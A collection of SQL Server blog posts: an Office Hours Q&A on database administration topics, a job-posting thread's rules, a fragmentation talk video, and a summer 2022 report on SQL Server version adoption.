Don’t Blame Anthony: How do you deal with undetected write errors in SQL server?

Detect them by running DBCC CHECKDB as frequently as practical – even overnight if your business windows allow it.

Anatoli: What interesting tools do you know of (besides SSMS / Sentry Plan Explorer) that will parse SQL query plans?

Quest Spotlight Tuning Pack is another one.

DBAInProgress: Hello Brent. What different screencast softwares have you used to overlay yourself onto your screen with audio?

Read this.

Piotr: What are your favorite DMV’s in Azure SQL DB?

I don’t have a separate set there – I try to use common ground between both Azure and SQL Server.

Fyodor: Do you have any guidelines for maximum number of columns to allow for the include columns in a NC index?

Yes, and we discuss them in my Mastering Index Tuning class.

Mahesh: When Sql is migrated to cloud will there be a change to RTO and RPO .

Yes.

DanishDBA: Hi Brent. My friend is going to implement logging requirements from customers. They want to see who changed a column value, date and old/new value. Is System-versioned Temporal Tables the recommended solution when performance is the main concern? What are your thoughts on this?

If performance is the main concern, only log the specific columns you care about. For example, you probably wouldn’t want to monitor high-velocity columns like QuantityInStock. When you only care about specific columns and specific sources, triggers are likely to be faster, and generate less transaction log activity.

Skrillex: How do you verify that it’s safe to upgrade DB compat mode to latest version? 2014 to 2019 in this case.

Read this.

Urquan: What percent of your clients license SQL by the server / core vs Microsoft Assurance?

Of course I have a straight face under here, why do you ask?

I don’t track that. I don’t sell licensing. I don’t even ask clients how they’re licensing it.

Guðmundur: For query perf testing, can you hint DB compat level at the query level vs changing for entire DB?

Read this.

Piotr: What is your opinion of external tables in Azure SQL DB? Do they perform any better than linked servers in on-prem SQL Server?

Never used ’em.

Elijah: Are there workflow orchestrators that you recommend as an alternative for SSIS? SSIS seems to have pain-points around metadata getting out of date, difficulty to review as code, and being difficult to debug for large workflows. However, nothing else seems to work with SQL Agent.

I don’t work with SSIS, so I’d post that on #SQLHelp.

Anatoli: What are the ideal display columns / column order when running sp_whoisactive to triage a server performance fire?

The defaults. Learn to use the defaults so that when you parachute into a server you’ve never seen before, you can work quickly.

Chenjesu: Do you see any interesting SQL alerting mechanisms at your clients other than email?

No.

Bryan Flores: Hello Brend, do you recommend sql server replication in 2019 or 2022, but do you recommend instead of replication

Come on, Ryan, that’s like asking if I recommend hammers. What’s the problem you’re trying to solve? Don’t ask if you should use a tool – describe the problem you’re facing, and then we can pick the right tool, Mr. Flowers.

Yehat: How do SQL DB snapshots compare with SAN snapshots as a potential rollback mechanism for a failed application deployment / update?

Most of the clients I work with have some kind of high availability and disaster recovery mechanism like log shipping, AGs, or SAN replication. You can’t roll back a database snapshot without affecting everything downstream. SAN snapshots have similar problems, but if you’re also using SAN replication for DR, the syncing back & forth is way easier.

The Swedish Chef: How do you project costs for hypothetical Azure SQL Managed instance against hypothetical SQL in Azure VM? Need to figure out who wins a bakeoff and migrate from on-prem.

Start by exactly quantifying your per-server costs to build, manage, and troubleshoot Always On Availability Groups for a single cluster. If you can’t do that, a true cost comparison is hopeless. (Hint: it’s hopeless.)

Anatoli: What is your opinion of the TSQL MERGE statement? Do you have any performance tips when using it?

Read this.

Sajawal: Please don’t say NO. How can we read an execution on Azure Synapse Analytics? Please help us in that world as well.

I’ve never used Synapse Analytics.

Yitzhak: Do SSMS live query stats ever get you over the performance finish line?

Yes, but read this.

Vilhelms: When do you like to use sp_blitzwho vs when do you like to use sp_whoisactive?

I answer that one in this module of my How I Use the First Responder Kit class.

Guðmundur: Which SQL locking model is easier for developers to understand and code? Optimistic or pessimistic locking?

Optimistic.

SQL_RAGE: How does referencing a column by an alias versus the column name influence SQL’s decision on which execution plan to use? Seeing SQL use a bad plan for a query using the aliased column column name in an ORDER BY, but uses a good plan when using the column alias.

Odds are, it’s unrelated to the alias, and related to optimization timeouts. I explain those in my Fundamentals of Query Tuning class.

Ramil: Hi Brent! App controls a lot of things like amount of database files-only one, indexes can be created only via app, partitioning is not allowed. How can I scale up horizontally in this case? because DB is growing 250gb per month. OLTP DB, currently 1.8 TB, in AlwaysOn AG.

I think you fundamentally misunderstand scaling terms. Scaling up vertically refers to adding hardware. Scaling out horizontally refers to adding more servers. In either case, this is pretty far beyond a free Office Hours question – feel free to click Consulting at the top of the screen before you make a multi-million-dollar licensing and hardware architecture plan.

Fyodor: Would you consider blogging a list of your top 10 most watched Ozar You Tube videos?

No, because people who aren’t smart enough to go to my YouTube channel, click Videos, and click Sort By aren’t smart enough to hold down database jobs anyway.


Who’s Hiring in the Database Community? September 2022 Edition

Who's Hiring
18 Comments

Is your company hiring for a database position as of September 2022? Do you wanna work with the kinds of people who read this blog? Let’s set up some rapid networking here. If your company is hiring, leave a comment.

The rules:

  • Your comment must include the job title, and either a link to the full job description, or the text of it. It doesn’t have to be a SQL Server DBA job, but it does have to be related to databases. (We get a pretty broad readership here – it can be any database.)
  • An email address to send resumes, or a link to the application process – if I were you, I’d put an email address because you may want to know that applicants are readers here, because they might be more qualified than the applicants you regularly get.
  • Please state the location and include REMOTE and/or VISA when that sort of candidate is welcome. When remote work is not an option, include ONSITE.
  • Please only post if you personally are part of the hiring company—no recruiting firms or job boards. Only one post per company. If it isn’t a household name, please explain what your company does.
  • Commenters: please don’t reply to job posts to complain about something. It’s off topic here.
  • Readers: please only email if you are personally interested in the job.

If your comment isn’t relevant or smells fishy, I’ll delete it. If you have questions about why your comment got deleted, or how to maximize the effectiveness of your comment, contact me.

Each month, I publish a new post in the Who’s Hiring category here so y’all can get the latest opportunities.


[Video] Fragmentation Explained in 20 Minutes at SQLBits

Index Maintenance, Videos
23 Comments

What does fragmentation mean? How does it happen? Can you fix it with fill factor? Should you rebuild your indexes to fix it?

At the SQLBits conference, I tried a new way of explaining it using markers and pieces of whiteboard paper as database pages, and doing inserts live on the fly.

What you see onscreen is actually what the in-person audience saw up on the projector. Prior to the session, I rigged up a tripod and camera aimed down at the desk so the audience could watch me work.

I had so much fun with this session, and I’m so proud of the results. I want to thank SQLBits for recording the sessions and making them freely available on YouTube, and the sponsors for making it possible!


SQL ConstantCare® Population Report: Summer 2022

Ever wonder how fast people are adopting new versions of SQL Server, or what’s “normal” out there for SQL Server adoption rates, hardware sizes, or numbers of databases? Let’s find out in the summer 2022 version of our SQL ConstantCare® population report.

Out of the 3,151 servers sending in data recently, the most popular version of SQL Server is still 2016:

This will be the last version of the report where I’ll break out 2008, 2008 R2, and 2012 separately. Going forward, I’ll just lump ’em under “2012 & Prior” since they’ll add up to even less the next time I do the report.

Mainstream support is over for SQL Server 2014 & 2016, so here’s a number that makes me a little nervous: only 55% of servers are under mainstream support. When SQL Server 2017’s mainstream support ends on October 22, that means only the 23% of users on SQL Server 2019, and the 13% in Azure SQL DB, will be getting regular updates. Yowza.

SQL Server 2016, 2017, and 2019 account for 69% of the user population, and Azure SQL DB took a big jump from about 1% up to about 11%.

Up in the cloud, Azure SQL DB jumped dramatically from 1% overall to about 13%, with 11% of that being Azure SQL DB itself, and Managed Instances at 2% of the population.

The newer products are at the top of this chart, and the new data’s at the right, so you can see the new stuff gradually pushing down the old stuff over time:

While the most popular version is still SQL Server 2016, this year 2019 is getting a lot closer. Every single version’s going down except SQL Server 2019 and Azure SQL DB.

These numbers help to give me perspective when I think about new adoptions of SQL Server 2022. It’s possible that SQL Server 2022 will gain adoption faster than 2019 did because I don’t think there were a whole lot of “I absolutely gotta have that” features in 2019. With 2022’s Availability Groups being able to fail back & forth to the cloud, if that ships in a solid, reliable, easy-to-troubleshoot way, that could be the killer feature that really spurs 2022 adoption.